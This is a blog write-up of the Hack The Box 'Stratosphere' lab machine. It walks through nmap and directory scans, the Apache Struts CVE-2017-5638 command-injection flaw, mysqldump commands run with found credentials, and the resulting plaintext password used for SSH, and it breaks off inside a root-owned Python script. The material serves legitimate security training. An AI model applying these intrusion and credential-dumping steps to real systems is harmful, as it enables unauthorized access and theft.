<!DOCTYPE html><html lang="en" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>Hack The Box: Stratosphere write-up | GoDiego</title><meta name="generator" content="Jekyll v4.0.1" /><meta property="og:title" content="Hack The Box: Stratosphere write-up" /><meta name="author" content="Diego Bernal Adelantado" /><meta property="og:locale" content="en_US" /><meta name="description" content="Apache Struts vulnerability with SQL service dump, combined with an unexpected privesc due to some rabbit holes." /><meta property="og:description" content="Apache Struts vulnerability with SQL service dump, combined with an unexpected privesc due to some rabbit holes." /><link rel="canonical" href="https://diego95root.github.io/posts/Stratosphere/" /><meta property="og:url" content="https://diego95root.github.io/posts/Stratosphere/" /><meta property="og:site_name" content="GoDiego" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2017-08-22T00:00:00+02:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Hack The Box: Stratosphere write-up" /><meta name="twitter:site" content="@secfaults" /><meta name="twitter:creator" content="@Diego Bernal Adelantado" /> <script type="application/ld+json"> {"@type":"BlogPosting","headline":"Hack The Box: Stratosphere write-up","dateModified":"2017-08-22T00:00:00+02:00","datePublished":"2017-08-22T00:00:00+02:00","url":"https://diego95root.github.io/posts/Stratosphere/","mainEntityOfPage":{"@type":"WebPage","@id":"https://diego95root.github.io/posts/Stratosphere/"},"author":{"@type":"Person","name":"Diego Bernal Adelantado"},"description":"Apache Struts vulnerability with SQL service dump, combined with an unexpected privesc due to some rabbit holes.","@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><meta name="google-site-verification" content="H84_zouPIHmurw2-AF7oHrWvvqJ1HhxxPpp1B6Vjpx4" /><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/combine/npm/jquery@3.4.1,npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/combine/npm/jquery@3.4.1,npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" crossorigin="anonymous"></script> <script src="https://polyfill.io/v3/polyfill.min.js?features=es6" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js" async crossorigin="anonymous"></script> <script src="/assets/js/dist/commons.js" async></script> <script src="/assets/js/dist/timeago.min.js" async></script><link rel="preload" as="script" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js"> <script src="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js" async></script> <script src="/assets/js/dist/toc.min.js" async></script> <script src="/assets/js/dist/tooltip-loader.min.js" async></script> <script src="/app.js" defer></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/favicons/logo.png" alt="avatar"> </a></div><div class="profile-text mt-3"><div id="site-title"> <a href="/">GoDiego</a></div><div id="site-subtitle" class="font-italic">Student, Bug Hunter, Security Enthusiast</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-3 mr-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-3 mr-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-3 mr-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/timeline/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-3 mr-3 unloaded"></i> <span>TIMELINE</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-3 mr-3 unloaded"></i> <span>ABOUT ME</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <span id="mode-toggle-wrapper"> <!-- Switch the mode between dark and light. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <i class="mode-toggle fas fa-sun" dark-mode-invisible></i> <i class="mode-toggle fas fa-moon" light-mode-invisible></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.mode != null) { if (this.mode == ModeToggle.DARK_MODE) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.mode != null) { if (self.mode == ModeToggle.DARK_MODE) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightkMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightkMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span> <span class="icon-border"></span> <a href="https://github.com/diego95root" target="_blank"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/secfaults" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href="https://www.linkedin.com/in/diego-bernal-adelantado" target="_blank"> <i class="fab fa-linkedin"></i> </a> <a href="https://www.hackthebox.eu/home/users/profile/31531" target="_blank"> <i class="fas fa-cube"></i> </a> <a href=" javascript:window.open('mailto:' + ['diegobernal0905','gmail.com'].join('@'))" > <i class="fas fa-envelope"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Hack The Box: Stratosphere write-up</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Hack The Box: Stratosphere write-up</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <span class="timeago" data-toggle="tooltip" data-placement="bottom" title="Tue, Aug 22, 2017, 12:00 AM +0200"> Aug 22, 2017 <i class="unloaded">2017-08-22T00:00:00+02:00</i> </span> by <span class="author"> Diego Bernal Adelantado </span></div></div><div class="post-content"> <img src="/assets/posts_details/Stratosphere/images/header.png"><h1 id="hack-the-box-stratosphere-machine-write-up">Hack The Box: Stratosphere machine write-up</h1><p>The machine we are going to tackle today runs with ip 10.10.10.64. I also uploaded some results from tools as well as some notes I took along the way.</p><h4 id="enumeration">Enumeration</h4><p>As always, first of all I enumerate open ports to discover the services running in the machine. I ran the following:</p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-oA</span> first 10.10.10.64
</pre></table></code></div></div><p>And the result was:</p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre>Nmap scan report <span class="k">for </span>10.10.10.64
Host is up <span class="o">(</span>0.054s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 997 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d <span class="o">(</span>RSA<span class="o">)</span>
|_  256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 <span class="o">(</span>ECDSA<span class="o">)</span>
80/tcp   open  http
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
8080/tcp open  http-proxy
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
2 services unrecognized despite returning data.
</pre></table></code></div></div><p>Notice the machines has got activated ssh, which will be useful later.</p><p>So the first thing I do upon seeing this is connect to the server on port 80, and I find a website. However, there aren’t any possible attack vectors, so I decide to enumerate directories with Dirb and DirBuster:</p><p>First of all, with Dirb I found out the path to the manager of the apache server:</p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre><td class="rouge-code"><pre><span class="nt">-----------------</span>
DIRB v2.22    
By The Dark Raver
<span class="nt">-----------------</span>

START_TIME: Tue May 22 17:44:47 2018
URL_BASE: http://10.10.10.64/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

<span class="nt">-----------------</span>

GENERATED WORDS: 4612                                                          

<span class="nt">----</span> Scanning URL: http://10.10.10.64/ <span class="nt">----</span>
+ http://10.10.10.64/host-manager <span class="o">(</span>CODE:302|SIZE:0<span class="o">)</span>                            
+ http://10.10.10.64/index.html <span class="o">(</span>CODE:200|SIZE:1708<span class="o">)</span>                           
+ http://10.10.10.64/manager <span class="o">(</span>CODE:302|SIZE:0<span class="o">)</span>                                 

<span class="nt">-----------------</span>
END_TIME: Tue May 22 17:49:20 2018
DOWNLOADED: 4612 - FOUND: 3

</pre></table></code></div></div><p>However, it was of no use, as I didn’t have any credentials to log in. That’s when I fired up DirBuster, getting:</p><p><em>DirBuster output</em></p><p><img src="/assets/posts_details/Stratosphere/images/dirbuster.png" alt="Img" title="Img" /></p><p>Looks like <em>/Monitoring/index.html</em> is interesting. Once we try to access it, we get redirected to another path, which has an extension I hadn’t ever seen before: <em>.action</em>.</p><p><em>Redirection page</em></p><p><img src="/assets/posts_details/Stratosphere/images/monitoring.png" alt="Img" title="Img" /></p><h4 id="vulnerability">Vulnerability</h4><p>After inspecting the possible vulnerabilities, I found none I knew, so I decided to google “action apache struts vulnerability” (I knew it was apache struts from the error log I got when trying to access the management console). I found that there was a known CVE (2017-5638) and even a Python script that would carry out the exploit (although it could be done with Burp). The vulnerability consisted in a misconfiguration with error which leads to arbitrary commands supplied in the Content-Type header.</p><p><em>From <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638</a>: The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.</em></p><p>So I checked whether the machine was vulnerable and indeed it was!</p><p><em>Check of vulnerability</em></p><p><img src="/assets/posts_details/Stratosphere/images/1check.png" alt="Img" title="Img" /></p><p>Even though that meant I had RCE, I was only tomcat8 and couldn’t read many things. For instance, I couldn’t access the directory of the user of the system, called Richard.</p><p>Keeping that in mind, I decided to check the files and came across db_connect, which had some credentials (for a database, I guessed seeing the name). The two pairs are found in notes.txt, one corresponds to admin and the other one to ssn_admin. Nothing else came out.</p><p>Then, I was advised to enumerate running services and found there was a local MariaDB service running locally. I used:</p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>ss <span class="nt">-lntu</span>
service mysqld status
</pre></table></code></div></div><p>And that was when I thought about the credentials I had found earlier. Maybe there was a way to see what was inside the database. However, there was a problem: the service was not accessible, I couldn’t simply log in and execute commands, they had to come from the command line.</p><p>After investigating possible mysql commands, I came across the following ones (I tried with both users but only admin was valid):</p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>mysqldump <span class="nt">--user</span><span class="o">=</span>admin <span class="nt">--password</span><span class="o">=</span>admin <span class="nt">--all-databases</span>
</pre></table></code></div></div><p>Result:</p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre><td class="rouge-code"><pre>mysqldump: Got error: 1044: <span class="s2">"Access denied for user 'admin'@'localhost' to database 'users'"</span> when using LOCK TABLES
<span class="nt">--</span> MySQL dump 10.16  Distrib 10.1.26-MariaDB, <span class="k">for </span>debian-linux-gnu <span class="o">(</span>x86_64<span class="o">)</span>
<span class="nt">--</span>
<span class="nt">--</span> Host: localhost    Database:
<span class="nt">--</span> <span class="nt">------------------------------------------------------</span>
<span class="nt">--</span> Server version	10.1.26-MariaDB-0+deb9u1

/<span class="k">*</span><span class="o">!</span>40101 SET @OLD_CHARACTER_SET_CLIENT<span class="o">=</span>@@CHARACTER_SET_CLIENT <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET @OLD_CHARACTER_SET_RESULTS<span class="o">=</span>@@CHARACTER_SET_RESULTS <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET @OLD_COLLATION_CONNECTION<span class="o">=</span>@@COLLATION_CONNECTION <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET NAMES utf8mb4 <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40103 SET @OLD_TIME_ZONE<span class="o">=</span>@@TIME_ZONE <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40103 SET <span class="nv">TIME_ZONE</span><span class="o">=</span><span class="s1">'+00:00'</span> <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40014 SET @OLD_UNIQUE_CHECKS<span class="o">=</span>@@UNIQUE_CHECKS, <span class="nv">UNIQUE_CHECKS</span><span class="o">=</span>0 <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40014 SET @OLD_FOREIGN_KEY_CHECKS<span class="o">=</span>@@FOREIGN_KEY_CHECKS, <span class="nv">FOREIGN_KEY_CHECKS</span><span class="o">=</span>0 <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET @OLD_SQL_MODE<span class="o">=</span>@@SQL_MODE, <span class="nv">SQL_MODE</span><span class="o">=</span><span class="s1">'NO_AUTO_VALUE_ON_ZERO'</span> <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40111 SET @OLD_SQL_NOTES<span class="o">=</span>@@SQL_NOTES, <span class="nv">SQL_NOTES</span><span class="o">=</span>0 <span class="k">*</span>/<span class="p">;</span>

<span class="nt">--</span>
<span class="nt">--</span> Current Database: <span class="sb">`</span><span class="nb">users</span><span class="sb">`</span>
<span class="nt">--</span>

CREATE DATABASE /<span class="k">*</span><span class="o">!</span>32312 IF NOT EXISTS<span class="k">*</span>/ <span class="sb">`</span><span class="nb">users</span><span class="sb">`</span> /<span class="k">*</span><span class="o">!</span>40100 DEFAULT CHARACTER SET utf8mb4 <span class="k">*</span>/<span class="p">;</span>

USE <span class="sb">`</span><span class="nb">users</span><span class="sb">`</span><span class="p">;</span>
</pre></table></code></div></div><p>So seeing there was a ‘users’ table, I accessed it:</p><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>mysqldump <span class="nt">--single-transaction</span> <span class="nt">--user</span><span class="o">=</span>admin <span class="nb">users</span> <span class="nt">--password</span><span class="o">=</span>admin
</pre></table></code></div></div><div class="language-sh highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
</pre><td class="rouge-code"><pre><span class="nt">--</span> MySQL dump 10.16  Distrib 10.1.26-MariaDB, <span class="k">for </span>debian-linux-gnu <span class="o">(</span>x86_64<span class="o">)</span>
<span class="nt">--</span>
<span class="nt">--</span> Host: localhost    Database: <span class="nb">users</span>
<span class="nt">--</span> <span class="nt">------------------------------------------------------</span>
<span class="nt">--</span> Server version	10.1.26-MariaDB-0+deb9u1

/<span class="k">*</span><span class="o">!</span>40101 SET @OLD_CHARACTER_SET_CLIENT<span class="o">=</span>@@CHARACTER_SET_CLIENT <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET @OLD_CHARACTER_SET_RESULTS<span class="o">=</span>@@CHARACTER_SET_RESULTS <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET @OLD_COLLATION_CONNECTION<span class="o">=</span>@@COLLATION_CONNECTION <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET NAMES utf8mb4 <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40103 SET @OLD_TIME_ZONE<span class="o">=</span>@@TIME_ZONE <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40103 SET <span class="nv">TIME_ZONE</span><span class="o">=</span><span class="s1">'+00:00'</span> <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40014 SET @OLD_UNIQUE_CHECKS<span class="o">=</span>@@UNIQUE_CHECKS, <span class="nv">UNIQUE_CHECKS</span><span class="o">=</span>0 <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40014 SET @OLD_FOREIGN_KEY_CHECKS<span class="o">=</span>@@FOREIGN_KEY_CHECKS, <span class="nv">FOREIGN_KEY_CHECKS</span><span class="o">=</span>0 <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET @OLD_SQL_MODE<span class="o">=</span>@@SQL_MODE, <span class="nv">SQL_MODE</span><span class="o">=</span><span class="s1">'NO_AUTO_VALUE_ON_ZERO'</span> <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40111 SET @OLD_SQL_NOTES<span class="o">=</span>@@SQL_NOTES, <span class="nv">SQL_NOTES</span><span class="o">=</span>0 <span class="k">*</span>/<span class="p">;</span>

<span class="nt">--</span>
<span class="nt">--</span> Table structure <span class="k">for </span>table <span class="sb">`</span>accounts<span class="sb">`</span>
<span class="nt">--</span>

DROP TABLE IF EXISTS <span class="sb">`</span>accounts<span class="sb">`</span><span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET @saved_cs_client     <span class="o">=</span> @@character_set_client <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET character_set_client <span class="o">=</span> utf8 <span class="k">*</span>/<span class="p">;</span>
CREATE TABLE <span class="sb">`</span>accounts<span class="sb">`</span> <span class="o">(</span>
  <span class="sb">`</span>fullName<span class="sb">`</span> varchar<span class="o">(</span>45<span class="o">)</span> DEFAULT NULL,
  <span class="sb">`</span>password<span class="sb">`</span> varchar<span class="o">(</span>30<span class="o">)</span> DEFAULT NULL,
  <span class="sb">`</span>username<span class="sb">`</span> varchar<span class="o">(</span>20<span class="o">)</span> DEFAULT NULL
<span class="o">)</span> <span class="nv">ENGINE</span><span class="o">=</span>InnoDB DEFAULT <span class="nv">CHARSET</span><span class="o">=</span>utf8mb4<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET character_set_client <span class="o">=</span> @saved_cs_client <span class="k">*</span>/<span class="p">;</span>

<span class="nt">--</span>
<span class="nt">--</span> Dumping data <span class="k">for </span>table <span class="sb">`</span>accounts<span class="sb">`</span>
<span class="nt">--</span>

LOCK TABLES <span class="sb">`</span>accounts<span class="sb">`</span> WRITE<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40000 ALTER TABLE <span class="sb">`</span>accounts<span class="sb">`</span> DISABLE KEYS <span class="k">*</span>/<span class="p">;</span>
INSERT INTO <span class="sb">`</span>accounts<span class="sb">`</span> VALUES <span class="o">(</span><span class="s1">'Richard F. Smith'</span>,<span class="s1">'9tc*rhKuG5TyXvUJOrE^5CK7k'</span>,<span class="s1">'richard'</span><span class="o">)</span><span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40000 ALTER TABLE <span class="sb">`</span>accounts<span class="sb">`</span> ENABLE KEYS <span class="k">*</span>/<span class="p">;</span>
UNLOCK TABLES<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40103 SET <span class="nv">TIME_ZONE</span><span class="o">=</span>@OLD_TIME_ZONE <span class="k">*</span>/<span class="p">;</span>

/<span class="k">*</span><span class="o">!</span>40101 SET <span class="nv">SQL_MODE</span><span class="o">=</span>@OLD_SQL_MODE <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40014 SET <span class="nv">FOREIGN_KEY_CHECKS</span><span class="o">=</span>@OLD_FOREIGN_KEY_CHECKS <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40014 SET <span class="nv">UNIQUE_CHECKS</span><span class="o">=</span>@OLD_UNIQUE_CHECKS <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET <span class="nv">CHARACTER_SET_CLIENT</span><span class="o">=</span>@OLD_CHARACTER_SET_CLIENT <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET <span class="nv">CHARACTER_SET_RESULTS</span><span class="o">=</span>@OLD_CHARACTER_SET_RESULTS <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40101 SET <span class="nv">COLLATION_CONNECTION</span><span class="o">=</span>@OLD_COLLATION_CONNECTION <span class="k">*</span>/<span class="p">;</span>
/<span class="k">*</span><span class="o">!</span>40111 SET <span class="nv">SQL_NOTES</span><span class="o">=</span>@OLD_SQL_NOTES <span class="k">*</span>/<span class="p">;</span>

<span class="nt">--</span> Dump completed on 2018-05-24  6:09:00
</pre></table></code></div></div><p>The most important line was <code class="highlighter-rouge">('Richard F. Smith','9tc*rhKuG5TyXvUJOrE^5CK7k','richard')</code>, as it contained the credentials of the user richard. I used them to log in through ssh as richard and success!!</p><p><em>Logging in as Richard</em></p><p><img src="/assets/posts_details/Stratosphere/images/ssh.png" alt="Img" title="Img" /></p><h4 id="root">Root</h4><p>Getting to root was way more difficult than user, it got me to think a lot (quite unnecessarily). The first thing I noticed once I was Richard was a test.py file owned by root. It consisted of some hashes that had to be cracked in order to access some file inside the root directory called <code class="highlighter-rouge">success.py</code>.</p><div class="language-py highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
</pre><td class="rouge-code"><pre><span class="c1">#!/usr/bin/python3
</span><span class="kn">import</span> <span class="nn">hashlib</span>


<span class="k">def</span> <span class="nf">question</span><span class="p">():</span>
    <span class="n">q1</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s">"Solve: 5af003e100c80923ec04d65933d382cb</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
    <span class="n">md5</span> <span class="o">=</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">md5</span><span class="p">()</span>
